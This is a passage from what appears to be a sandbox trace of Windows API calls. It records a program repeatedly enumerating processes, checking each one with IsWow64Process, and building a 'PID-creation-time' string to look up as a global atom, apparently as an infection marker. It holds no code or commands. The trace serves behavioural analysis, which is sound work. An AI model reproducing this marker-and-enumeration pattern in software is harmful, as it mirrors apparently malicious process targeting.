	[0116.015] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.015] CloseHandle (hObject=0x698) returned 1
	[0116.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.016] CloseHandle (hObject=0x698) returned 1
	[0116.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.016] CloseHandle (hObject=0x698) returned 1
	[0116.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.016] CloseHandle (hObject=0x698) returned 1
	[0116.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.016] CloseHandle (hObject=0x698) returned 1
	[0116.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.016] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.016] CloseHandle (hObject=0x698) returned 1
	[0116.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.017] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.017] CloseHandle (hObject=0x698) returned 1
	[0116.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.021] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.021] CloseHandle (hObject=0x698) returned 1
	[0116.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.021] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.021] CloseHandle (hObject=0x698) returned 1
	[0116.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.022] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.022] CloseHandle (hObject=0x698) returned 1
	[0116.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.022] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.022] CloseHandle (hObject=0x698) returned 1
	[0116.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.022] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.022] CloseHandle (hObject=0x698) returned 1
	[0116.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.022] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.022] CloseHandle (hObject=0x698) returned 1
	[0116.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.023] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.023] CloseHandle (hObject=0x698) returned 1
	[0116.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.023] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.023] CloseHandle (hObject=0x698) returned 1
	[0116.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.023] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.023] CloseHandle (hObject=0x698) returned 1
	[0116.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.023] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.023] CloseHandle (hObject=0x698) returned 1
	[0116.023] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.023] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.023] CloseHandle (hObject=0x698) returned 1
	[0116.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.024] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.024] CloseHandle (hObject=0x698) returned 1
	[0116.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.024] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.024] CloseHandle (hObject=0x698) returned 1
	[0116.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.024] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.024] CloseHandle (hObject=0x698) returned 1
	[0116.024] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.024] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.025] CloseHandle (hObject=0x698) returned 1
	[0116.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.025] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.025] CloseHandle (hObject=0x698) returned 1
	[0116.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.025] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.025] CloseHandle (hObject=0x698) returned 1
	[0116.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.025] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.025] CloseHandle (hObject=0x698) returned 1
	[0116.025] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.025] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.025] CloseHandle (hObject=0x698) returned 1
	[0116.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.026] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.026] CloseHandle (hObject=0x698) returned 1
	[0116.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.026] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.026] CloseHandle (hObject=0x698) returned 1
	[0116.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.026] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.026] CloseHandle (hObject=0x698) returned 1
	[0116.026] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.027] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.027] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.027] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.027] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.027] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.028] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.028] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.028] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.028] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.028] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.028] CloseHandle (hObject=0x698) returned 1
	[0116.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.028] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.028] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.028] CloseHandle (hObject=0x698) returned 1
	[0116.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.029] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.029] CloseHandle (hObject=0x698) returned 1
	[0116.029] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.029] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.029] CloseHandle (hObject=0x698) returned 1
	[0116.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.065] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.065] CloseHandle (hObject=0x698) returned 1
	[0116.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.066] CloseHandle (hObject=0x698) returned 1
	[0116.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.066] CloseHandle (hObject=0x698) returned 1
	[0116.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.066] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.066] CloseHandle (hObject=0x698) returned 1
	[0116.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.067] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.067] CloseHandle (hObject=0x698) returned 1
	[0116.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.067] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.067] CloseHandle (hObject=0x698) returned 1
	[0116.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.068] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.068] CloseHandle (hObject=0x698) returned 1
	[0116.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.068] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.068] CloseHandle (hObject=0x698) returned 1
	[0116.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.069] CloseHandle (hObject=0x698) returned 1
	[0116.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0116.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.069] CloseHandle (hObject=0x698) returned 1
	[0116.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0116.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.069] CloseHandle (hObject=0x698) returned 1
	[0116.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0116.069] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.069] CloseHandle (hObject=0x698) returned 1
	[0116.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0116.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.070] CloseHandle (hObject=0x698) returned 1
	[0116.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0116.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.070] CloseHandle (hObject=0x698) returned 1
	[0116.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0116.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.070] CloseHandle (hObject=0x698) returned 1
	[0116.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0116.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.070] CloseHandle (hObject=0x698) returned 1
	[0116.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0116.070] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.071] CloseHandle (hObject=0x698) returned 1
	[0116.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0116.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.071] CloseHandle (hObject=0x698) returned 1
	[0116.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0116.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.071] CloseHandle (hObject=0x698) returned 1
	[0116.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0116.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.071] CloseHandle (hObject=0x698) returned 1
	[0116.071] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0116.071] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.071] CloseHandle (hObject=0x698) returned 1
	[0116.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0116.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.072] CloseHandle (hObject=0x698) returned 1
	[0116.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0116.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.072] CloseHandle (hObject=0x698) returned 1
	[0116.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0116.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.072] CloseHandle (hObject=0x698) returned 1
	[0116.072] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0116.072] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.073] CloseHandle (hObject=0x698) returned 1
	[0116.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0116.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.073] CloseHandle (hObject=0x698) returned 1
	[0116.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0116.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.073] CloseHandle (hObject=0x698) returned 1
	[0116.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0116.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.073] CloseHandle (hObject=0x698) returned 1
	[0116.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0116.073] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.073] CloseHandle (hObject=0x698) returned 1
	[0116.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0116.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.074] CloseHandle (hObject=0x698) returned 1
	[0116.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.074] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.074] CloseHandle (hObject=0x698) returned 1
	[0116.074] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0116.074] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.075] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0116.075] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0116.075] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0116.075] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.075] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0116.076] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0116.076] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0116.076] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0116.076] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0116.076] CloseHandle (hObject=0x698) returned 1
	[0116.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0116.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0116.076] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.076] CloseHandle (hObject=0x698) returned 1
	[0116.076] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0116.076] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.076] CloseHandle (hObject=0x698) returned 1
	[0116.077] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0116.077] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.077] CloseHandle (hObject=0x698) returned 1
	[0116.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0116.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0116.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0116.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0116.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0116.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0116.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0116.163] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.163] CloseHandle (hObject=0x698) returned 1
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0116.163] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.163] CloseHandle (hObject=0x698) returned 1
	[0116.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0116.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0116.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.164] CloseHandle (hObject=0x698) returned 1
	[0116.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0116.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.164] CloseHandle (hObject=0x698) returned 1
	[0116.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0116.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.164] CloseHandle (hObject=0x698) returned 1
	[0116.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0116.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.164] CloseHandle (hObject=0x698) returned 1
	[0116.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0116.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.165] CloseHandle (hObject=0x698) returned 1
	[0116.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0116.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.165] CloseHandle (hObject=0x698) returned 1
	[0116.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0116.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0116.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0116.165] CloseHandle (hObject=0x698) returned 1
	[0116.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
